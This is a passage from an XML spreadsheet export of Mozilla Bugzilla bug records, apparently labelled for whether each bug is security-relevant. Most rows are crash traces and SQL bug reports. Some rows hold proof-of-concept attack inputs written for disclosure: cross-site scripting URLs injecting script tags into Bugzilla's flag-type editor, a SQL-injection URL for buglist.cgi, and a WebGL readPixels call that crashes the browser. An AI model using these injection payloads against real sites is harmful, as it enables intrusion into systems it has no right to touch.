    #160 0x7f934e03405b in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/ipc/glue/MessagePump.cpp:82:0
    #161 0x7f934ebe5051 in MessageLoop::RunInternal() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/buil</t>
        </is>
      </c>
      <c r="X4483" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4484">
      <c r="A4484" t="n">
        <v>1138417</v>
      </c>
      <c r="B4484" t="inlineStr">
        <is>
          <t>2015-03-02 06:19:10 -0800</t>
        </is>
      </c>
      <c r="C4484" t="inlineStr">
        <is>
          <t>sql_group_concat() generates bad SQL code with PostgreSQL 8.x</t>
        </is>
      </c>
      <c r="D4484" t="inlineStr">
        <is>
          <t>2015-04-09 10:01:52 -0700</t>
        </is>
      </c>
      <c r="E4484" t="n">
        <v>1</v>
      </c>
      <c r="F4484" t="n">
        <v>1</v>
      </c>
      <c r="G4484" t="n">
        <v>4</v>
      </c>
      <c r="H4484" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4484" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4484" t="inlineStr">
        <is>
          <t>Database</t>
        </is>
      </c>
      <c r="K4484" t="inlineStr">
        <is>
          <t>5.0</t>
        </is>
      </c>
      <c r="L4484" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4484" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4484" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4484" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4484" t="inlineStr"/>
      <c r="Q4484" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4484" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4484" t="inlineStr">
        <is>
          <t>Bugzilla 5.0</t>
        </is>
      </c>
      <c r="T4484" t="n">
        <v>1</v>
      </c>
      <c r="U4484" t="n">
        <v>0</v>
      </c>
      <c r="V4484" t="n">
        <v>19</v>
      </c>
      <c r="W4484" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Build ID: 20150224134236
Steps to reproduce:
I have installed Bugzilla 5.0 rc2 with Postgres 8.4. Requiremets says: "You need PostgreSQL version 8.03.0000 or higher."
I get DB-errors while trying to see the bug.
Bugzilla 5.0 rc2 works fine with Postgres 9.4.
Actual results:
I try to see the bug (after creating) and catch  DB errors:
An error occurred while performing a database operation:
DBD::Pg::db selectall_arrayref failed: ERROR:  syntax error at or near "ORDER"
LINE 1: SELECT comment_id, ARRAY_TO_STRING(ARRAY_AGG(tag ORDER BY ta...
                                                         ^ [for Statement "SELECT comment_id, ARRAY_TO_STRING(ARRAY_AGG(tag ORDER BY tag), ',')
               FROM longdescs_tags
              WHERE  comment_id IN (2) 
              GROUP BY comment_id"] at Bugzilla/Comment.pm line 162.
	Bugzilla::Comment::preload('Bugzilla::Comment', 'ARRAY(0x5d97350)') called at Bugzilla/Bug.pm line 3630
	Bugzilla::Bug::comments('Bugzilla::Bug=HASH(0x5d97a28)') called at Bugzilla/Bug.pm line 535
	Bugzilla::Bug::_preload_referenced_bugs('Bugzilla::Bug=HASH(0x5d97a28)') called at Bugzilla/Bug.pm line 517
	Bugzilla::Bug::preload('Bugzilla::Bug', 'ARRAY(0x554ac28)') called at /var/bugzilla/show_bug.cgi line 94
Expected results:
Bugzilla 5.0 rc2 works fine with Postgres 9.4.
I think you need to change DB Requirements or use old SQL syntax.</t>
        </is>
      </c>
      <c r="X4484" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4485">
      <c r="A4485" t="n">
        <v>1333858</v>
      </c>
      <c r="B4485" t="inlineStr">
        <is>
          <t>2017-01-25 10:56:46 -0800</t>
        </is>
      </c>
      <c r="C4485" t="inlineStr">
        <is>
          <t>SEGV in AddressIsPoisoned</t>
        </is>
      </c>
      <c r="D4485" t="inlineStr">
        <is>
          <t>2024-05-30 09:25:18 -0700</t>
        </is>
      </c>
      <c r="E4485" t="n">
        <v>1</v>
      </c>
      <c r="F4485" t="n">
        <v>1</v>
      </c>
      <c r="G4485" t="n">
        <v>3</v>
      </c>
      <c r="H4485" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4485" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4485" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K4485" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4485" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4485" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4485" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4485" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4485" t="inlineStr">
        <is>
          <t>gfx-noted [adv-main53+][adv-esr45.9+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q4485" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4485" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4485" t="inlineStr">
        <is>
          <t>mozilla55</t>
        </is>
      </c>
      <c r="T4485" t="n">
        <v>1</v>
      </c>
      <c r="U4485" t="n">
        <v>0</v>
      </c>
      <c r="V4485" t="n">
        <v>40</v>
      </c>
      <c r="W4485" t="inlineStr">
        <is>
          <t>Created attachment 8830433
repro-file.html
I have no idea if this bug actually has security impact, but marking as security issue just to be sure. Also feel free to fill in better summary. :)
Tested on:
OS: Ubuntu 16.04
Firefox: ASAN build from https://index.taskcluster.net/v1/task/gecko.v2.mozilla-central.latest.firefox.linux64-asan-opt/artifacts/public/build/target.tar.bz2 
sourcestamp: c989c7b352279925edf138373e4ca3f1540dbd5f
ASAN-trace:
=================================================================
==29577==ERROR: AddressSanitizer: SEGV on unknown address 0x10301b08743e (pc 0x00000049c268 bp 0x7ffecf6b6a40 sp 0x7ffecf6b61e0 T0)
    #0 0x49c267 in AddressIsPoisoned /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_mapping.h:297:29
    #1 0x49c267 in QuickCheckForUnpoisonedRegion /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:42
    #2 0x49c267 in memcpy /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438
    #3 0x7efcdf670ee2  (/usr/lib/x86_64-linux-gnu/dri/i965_dri.so+0x3beee2)
    #4 0x7efcdf671822  (/usr/lib/x86_64-linux-gnu/dri/i965_dri.so+0x3bf822)
    #5 0x7efcdf66bb1a  (/usr/lib/x86_64-linux-gnu/dri/i965_dri.so+0x3b9b1a)
    #6 0x7efcdf3df87e in _init (/usr/lib/x86_64-linux-gnu/dri/i965_dri.so+0x12d87e)
    #7 0x7efcdf3dfa01 in _init (/usr/lib/x86_64-linux-gnu/dri/i965_dri.so+0x12da01)
    #8 0x7efd07655dcc in raw_fReadPixels /home/worker/workspace/build/src/obj-firefox/dist/include/GLContext.h:1553:9
    #9 0x7efd07655dcc in mozilla::gl::GLContext::fReadPixels(int, int, int, int, unsigned int, unsigned int, void*) /home/worker/workspace/build/src/gfx/gl/GLContext.cpp:2881
    #10 0x7efd09e3eea0 in mozilla::WebGLContext::DoReadPixelsAndConvert(mozilla::webgl::FormatInfo const*, int, int, int, int, unsigned int, unsigned int, void*, unsigned int, unsigned int) /home/worker/workspace/build/src/dom/canvas/WebGLContextGL.cpp:1176:9
    #11 0x7efd09e3fede in mozilla::WebGLContext::ReadPixelsImpl(int, int, int, int, unsigned int, unsigned int, void*, unsigned int) /home/worker/workspace/build/src/dom/canvas/WebGLContextGL.cpp:1568:9
    #12 0x7efd09e3f64f in mozilla::WebGLContext::ReadPixels(int, int, int, int, unsigned int, unsigned int, mozilla::dom::ArrayBufferView_base&lt;&amp;js::UnwrapArrayBufferView, &amp;js::GetArrayBufferViewLengthAndData, &amp;(JS_GetArrayBufferViewType(JSObject*))&gt; const&amp;, unsigned int, mozilla::ErrorResult&amp;) /home/worker/workspace/build/src/dom/canvas/WebGLContextGL.cpp:1343:5
    #13 0x7efd093a49e1 in ReadPixels /home/worker/workspace/build/src/dom/canvas/WebGLContext.h:690:9
    #14 0x7efd093a49e1 in mozilla::dom::WebGLRenderingContextBinding::readPixels(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::WebGLContext*, JSJitMethodCallArgs const&amp;) /home/worker/workspace/build/src/obj-firefox/dom/bindings/WebGLRenderingContextBinding.cpp:11943
    #15 0x7efd09c5c0c0 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2914:13
    #16 0x7efd0f6a96cc in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:239:15
    #17 0x7efd0f6a96cc in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) 
.
.
.
Note: if I lower the value of second argument in: "gl.readPixels(0, 2147483647, 1, 1, gl.RGBA, gl.UNSIGNED_BYTE, new Uint8Array(4));" instead of crash I get a warning: "JavaScript warning: file:///tmp/repro-file.html, line 5: Error: WebGL warning: readPixels: Out-of-bounds reads with readPixels are deprecated, and may be slow."</t>
        </is>
      </c>
      <c r="X4485" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4486">
      <c r="A4486" t="n">
        <v>1294407</v>
      </c>
      <c r="B4486" t="inlineStr">
        <is>
          <t>2016-08-11 05:21:46 -0700</t>
        </is>
      </c>
      <c r="C4486" t="inlineStr">
        <is>
          <t>Firefox crash when packets with missing headers are received</t>
        </is>
      </c>
      <c r="D4486" t="inlineStr">
        <is>
          <t>2018-10-10 12:35:22 -0700</t>
        </is>
      </c>
      <c r="E4486" t="n">
        <v>1</v>
      </c>
      <c r="F4486" t="n">
        <v>1</v>
      </c>
      <c r="G4486" t="n">
        <v>3</v>
      </c>
      <c r="H4486" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4486" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4486" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K4486" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4486" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4486" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4486" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4486" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4486" t="inlineStr">
        <is>
          <t>[adv-main49+][adv-esr45.4+]</t>
        </is>
      </c>
      <c r="Q4486" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4486" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4486" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T4486" t="n">
        <v>1</v>
      </c>
      <c r="U4486" t="n">
        <v>0</v>
      </c>
      <c r="V4486" t="n">
        <v>9</v>
      </c>
      <c r="W4486" t="inlineStr">
        <is>
          <t>In Bug 1293422 I was inadvertently fuzzing Firefox with packets with missing headers, which caused heap corruption and an eventual crash. We should be rejecting invalid packets rather than crashing.</t>
        </is>
      </c>
      <c r="X4486" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4487">
      <c r="A4487" t="n">
        <v>1832195</v>
      </c>
      <c r="B4487" t="inlineStr">
        <is>
          <t>2023-05-09 17:21:28 -0700</t>
        </is>
      </c>
      <c r="C4487" t="inlineStr">
        <is>
          <t>Select Option Dropdown able to Overlap Fullscreen Notification Toast</t>
        </is>
      </c>
      <c r="D4487" t="inlineStr">
        <is>
          <t>2024-05-30 11:08:59 -0700</t>
        </is>
      </c>
      <c r="E4487" t="n">
        <v>1</v>
      </c>
      <c r="F4487" t="n">
        <v>1</v>
      </c>
      <c r="G4487" t="n">
        <v>3</v>
      </c>
      <c r="H4487" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4487" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4487" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4487" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4487" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4487" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4487" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4487" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4487" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main115+]</t>
        </is>
      </c>
      <c r="Q4487" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4487" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4487" t="inlineStr">
        <is>
          <t>116 Branch</t>
        </is>
      </c>
      <c r="T4487" t="n">
        <v>1</v>
      </c>
      <c r="U4487" t="n">
        <v>0</v>
      </c>
      <c r="V4487" t="n">
        <v>40</v>
      </c>
      <c r="W4487" t="inlineStr">
        <is>
          <t>Created attachment 9332525
testcase.html
When trigger requestFullscreen and slowdown code on select option element, the select option dropdown still appear even the browser goes into fullscreen.
## Tested on:
- Firefox Nightly 115.0a1 (2023-05-09) (64-bit) on KDE X11
- Firefox Nightly 115.0a1 (2023-05-09) (64-bit) on KDE Wayland
## Steps to reproduce:
1. Visit attached testcase.html
2. Click "AAAAAAAAAAAAAAAAAAAAAAA..." on select option element
3. Select option dropdown overlap the fullscreen notification toast</t>
        </is>
      </c>
      <c r="X4487" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4488">
      <c r="A4488" t="n">
        <v>108812</v>
      </c>
      <c r="B4488" t="inlineStr">
        <is>
          <t>2001-11-06 22:49:18 -0800</t>
        </is>
      </c>
      <c r="C4488" t="inlineStr">
        <is>
          <t>[security] We allow the user to send arbitary SQL!!!!!</t>
        </is>
      </c>
      <c r="D4488" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E4488" t="n">
        <v>1</v>
      </c>
      <c r="F4488" t="n">
        <v>1</v>
      </c>
      <c r="G4488" t="n">
        <v>4</v>
      </c>
      <c r="H4488" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4488" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4488" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K4488" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L4488" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4488" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4488" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4488" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4488" t="inlineStr">
        <is>
          <t>applied to 2.14.1</t>
        </is>
      </c>
      <c r="Q4488" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4488" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4488" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T4488" t="n">
        <v>1</v>
      </c>
      <c r="U4488" t="n">
        <v>0</v>
      </c>
      <c r="V4488" t="n">
        <v>11</v>
      </c>
      <c r="W4488" t="inlineStr">
        <is>
          <t>So, buglist.cgi has an sql paramater. And, as long as that doen't contain a
semicolon, we send it. Oops.
The above url will allow you to see the title of a test security group bug. Its
more complicated than it looks -
bugzilla.mozilla.org/buglist.cgi?sql=1%3E2)%20OR%20(bugs.bug_id=106544 (%3E is
&gt;, and %20 is space) would work as well, except that then we join the users
table cubed then, without conditions, and that takes a long long long long long
time on bmo.
This was presumably added for advanced query support, or something. Lets kill
it. Its a huge hole, and even if we someone patch it up it sitll makes me nervous.
This turned up another bug, which I discovered over the weekend - my
SelectVisible stuff does "WHERE (security conditions) AND other stuff" rather
than "WHERE (security conditions) AND (other stuff)". That wouldn't have helped
in this case, though, because the extra bracketing could have been easily
removed. Fixing that may be interesting, since the where clause isn't the end -
we have to search for HAVING/GROUP BY in the rest of the where, while still
letting people search for bugs containing the word having. I have no idea how to
do that. I was vaguely aware of this when I wrote the support, but all places
which use that code use AND. If someone can tell me how to fix it, I will.</t>
        </is>
      </c>
      <c r="X4488" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4489">
      <c r="A4489" t="n">
        <v>1257361</v>
      </c>
      <c r="B4489" t="inlineStr">
        <is>
          <t>2016-03-16 15:56:41 -0700</t>
        </is>
      </c>
      <c r="C4489" t="inlineStr">
        <is>
          <t>Firefox doesn't actually enable GMP sandboxing if started with a seccomp-bpf filter already applied</t>
        </is>
      </c>
      <c r="D4489" t="inlineStr">
        <is>
          <t>2021-12-07 14:10:25 -0800</t>
        </is>
      </c>
      <c r="E4489" t="n">
        <v>1</v>
      </c>
      <c r="F4489" t="n">
        <v>1</v>
      </c>
      <c r="G4489" t="n">
        <v>3</v>
      </c>
      <c r="H4489" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4489" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4489" t="inlineStr">
        <is>
          <t>Security: Process Sandboxing</t>
        </is>
      </c>
      <c r="K4489" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4489" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4489" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4489" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4489" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4489" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+] sb+</t>
        </is>
      </c>
      <c r="Q4489" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4489" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4489" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T4489" t="n">
        <v>1</v>
      </c>
      <c r="U4489" t="n">
        <v>0</v>
      </c>
      <c r="V4489" t="n">
        <v>21</v>
      </c>
      <c r="W4489" t="inlineStr">
        <is>
          <t>Back in bug 969040 / bug 970676, I dealt with needing to start seccomp-bpf after the process is already multithreaded by sending a signal to each thread to do the prctl() call for itself, because seccomp state is (like most things in Linux) per-thread.  And, because threads could clone themselves while this is happening, I had the signal pseudo-broadcast repeat until all threads found themselves already sandboxed.
Problem is, I used PR_GET_SECCOMP, which returns 2 if the thread has one or more seccomp-bpf filters applied, which is not the same as whether it has *our* filter applied.  If Firefox is started with a seccomp-bpf filter already applied, that's inherited by child processes/threads, and the plugin-container threads will all think they have nothing to do and leave threads unsandboxed.  (I haven't tested this yet, but I'm pretty sure that's what will happen.)
In particular, LXC apparently runs containers with a seccomp-bpf filter applied to everything.  I don't know if this applies to all uses of containers -- it would be useful to know what the Docker containers we're using for TaskCluster do, in particular.
This shouldn't be a problem on kernels that have thread sync support (bug 1004011), but that conjecture is also not tested yet.
If unprivileged user namespaces are available… probably GeckoMediaPlugins will completely break, because we'll chroot to a deleted directory before calling dlopen(), and without seccomp-bpf to intercept the open() call it will fail.
Possible approaches:
* Keep a global std::set of tids signalled: not quite perfect, because tid reuse is theoretically possible, unless we do something like block each thread in the signal handler (more DIY futex()ing? read()ing a pipe that the main thread closes?) until everything is done.
* Thread local storage isn't async signal safe, so that won't work.
* Take another signal and use its blocked bit as a per-thread boolean.  That's kind of messy.
glibc does the same thing to implement setuid() and similar, but it doesn't have this problem because it can take a libc-internal lock that prevents concurrent thread creation/destruction.</t>
        </is>
      </c>
      <c r="X4489" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4490">
      <c r="A4490" t="n">
        <v>1158386</v>
      </c>
      <c r="B4490" t="inlineStr">
        <is>
          <t>2015-04-24 15:36:42 -0700</t>
        </is>
      </c>
      <c r="C4490" t="inlineStr">
        <is>
          <t>"API Documentation" is not documenting the expected format of parameters</t>
        </is>
      </c>
      <c r="D4490" t="inlineStr">
        <is>
          <t>2019-01-17 08:56:00 -0800</t>
        </is>
      </c>
      <c r="E4490" t="n">
        <v>1</v>
      </c>
      <c r="F4490" t="n">
        <v>1</v>
      </c>
      <c r="G4490" t="n">
        <v>4</v>
      </c>
      <c r="H4490" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4490" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4490" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K4490" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4490" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4490" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4490" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4490" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4490" t="inlineStr"/>
      <c r="Q4490" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4490" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4490" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4490" t="n">
        <v>1</v>
      </c>
      <c r="U4490" t="n">
        <v>0</v>
      </c>
      <c r="V4490" t="n">
        <v>7</v>
      </c>
      <c r="W4490" t="inlineStr">
        <is>
          <t>Every time I try to work with the API, I run into the issue of going to https://crash-stats.mozilla.com/api/ ("API Documentation") to find out about something, only to find out that it's missing the actual documentation of what format the parameters of the API expect.
Concrete example right now: /api/Bugs/ says to have a "signatures" parameter, which sounds like it could retrieve bugs for multiple signatures, but there is no documentation of how to specify multiple ones.</t>
        </is>
      </c>
      <c r="X4490" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4491">
      <c r="A4491" t="n">
        <v>924802</v>
      </c>
      <c r="B4491" t="inlineStr">
        <is>
          <t>2013-10-09 02:00:34 -0700</t>
        </is>
      </c>
      <c r="C4491" t="inlineStr">
        <is>
          <t>[SECURITY] (XSS) "id" and "sortkey" are not sanitized when editing flag types if categoryAction-foo is set</t>
        </is>
      </c>
      <c r="D4491" t="inlineStr">
        <is>
          <t>2024-05-30 08:08:03 -0700</t>
        </is>
      </c>
      <c r="E4491" t="n">
        <v>1</v>
      </c>
      <c r="F4491" t="n">
        <v>1</v>
      </c>
      <c r="G4491" t="n">
        <v>4</v>
      </c>
      <c r="H4491" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4491" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4491" t="inlineStr">
        <is>
          <t>Administration</t>
        </is>
      </c>
      <c r="K4491" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L4491" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4491" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4491" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4491" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4491" t="inlineStr"/>
      <c r="Q4491" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4491" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4491" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T4491" t="n">
        <v>1</v>
      </c>
      <c r="U4491" t="n">
        <v>0</v>
      </c>
      <c r="V4491" t="n">
        <v>15</v>
      </c>
      <c r="W4491" t="inlineStr">
        <is>
          <t>PoC:
http://localhost/bugzilla/editflagtypes.cgi?action=insert&amp;can_fully_edit=1&amp;id="&gt;&lt;script&gt;alert(1)&lt;/script&gt;&amp;token=&amp;target_type=bug&amp;check_clusions=1&amp;name=test1&amp;description=test2&amp;product=TestProduct&amp;component=TestComponent&amp;categoryAction-include=Include&amp;sortkey=1&amp;is_active=on&amp;is_requestable=on&amp;cc_list=&amp;is_requesteeble=on&amp;is_multiplicable=on&amp;grant_group=&amp;request_group=
http://localhost/bugzilla/editflagtypes.cgi?action=insert&amp;can_fully_edit=1&amp;id=&amp;token=&amp;target_type=bug&amp;check_clusions=1&amp;name=test&amp;description=test2&amp;product=TestProduct&amp;component=TestComponent&amp;categoryAction-include=Include&amp;sortkey=1"&gt;&lt;script&gt;alert(2)&lt;/script&gt;&amp;is_active=on&amp;is_requestable=on&amp;cc_list=&amp;is_requesteeble=on&amp;is_multiplicable=on&amp;grant_group=&amp;request_group=</t>
        </is>
      </c>
      <c r="X4491" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4492">
      <c r="A4492" t="n">
        <v>768750</v>
      </c>
      <c r="B4492" t="inlineStr">
        <is>
          <t>2012-06-26 19:19:11 -0700</t>
        </is>
      </c>
      <c r="C4492" t="inlineStr">
        <is>
          <t>"Assertion failure: !JSID_IS_VOID(id)" with XBL proto</t>
        </is>
      </c>
      <c r="D4492" t="inlineStr">
        <is>
          <t>2013-04-30 18:50:39 -0700</t>
        </is>
      </c>
      <c r="E4492" t="n">
        <v>1</v>
      </c>
      <c r="F4492" t="n">
        <v>1</v>
      </c>
      <c r="G4492" t="n">
        <v>3</v>
      </c>
      <c r="H4492" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4492" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4492" t="inlineStr">
        <is>
          <t>XBL</t>
        </is>
      </c>
      <c r="K4492" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4492" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4492" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4492" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4492" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4492" t="inlineStr">
        <is>
          <t>[adv-main18+]</t>
        </is>
      </c>
      <c r="Q4492" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4492" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4492" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T4492" t="n">
        <v>1</v>
      </c>
      <c r="U4492" t="n">
        <v>0</v>
      </c>
      <c r="V4492" t="n">
        <v>22</v>
      </c>
      <c r="W4492" t="inlineStr">
        <is>
          <t>Created attachment 636975
testcase (asserts fatally when loaded)
Assertion failure: !JSID_IS_VOID(id), at js/src/jsscope.cpp:617</t>
        </is>
      </c>
      <c r="X4492" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4493">
      <c r="A4493" t="n">
        <v>251960</v>
      </c>
      <c r="B4493" t="inlineStr">
        <is>
          <t>2004-07-17 23:05:10 -0700</t>
        </is>
      </c>
      <c r="C4493" t="inlineStr">
        <is>
          <t>Search.pm uses DB dependent comma operator</t>
        </is>
      </c>
      <c r="D4493" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:40 -0800</t>
        </is>
      </c>
      <c r="E4493" t="n">
        <v>1</v>
      </c>
      <c r="F4493" t="n">
        <v>1</v>
      </c>
      <c r="G4493" t="n">
        <v>4</v>
      </c>
      <c r="H4493" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4493" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4493" t="inlineStr">
        <is>
          <t>Query/Bug List</t>
        </is>
      </c>
      <c r="K4493" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4493" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4493" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4493" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4493" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4493" t="inlineStr"/>
      <c r="Q4493" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4493" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4493" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T4493" t="n">
        <v>1</v>
      </c>
      <c r="U4493" t="n">
        <v>2</v>
      </c>
